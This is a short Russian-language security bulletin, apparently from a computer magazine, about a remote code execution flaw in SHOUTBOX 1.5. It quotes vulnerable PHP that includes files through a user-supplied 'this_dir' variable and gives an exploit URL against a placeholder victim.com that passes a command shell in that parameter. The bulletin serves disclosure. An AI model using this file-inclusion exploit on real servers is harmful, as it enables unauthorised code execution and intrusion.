Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в S H O U T B O X.
Компьютер для продвинутых
пользователей
В этом выпуске:
S H O U T B O X
ПО: S H O U T B O X
Версия: 1.5
Уязвимость:
Уязвимость заключается в возможности выполнять произвольный код на
сервере.
Код: $this_dir = str_replace('\\', '/', dirname(__FILE__));
include("$this_dir/config.inc.php");
if(!isset($language)) $language = 'en';
include("$this_dir/lang_$language.inc");
include("$this_dir/smilies.inc"); Использование: http://www.victim.com/S H O U T B O
X/shoutbox.inc.php?this_dir=Command-Shell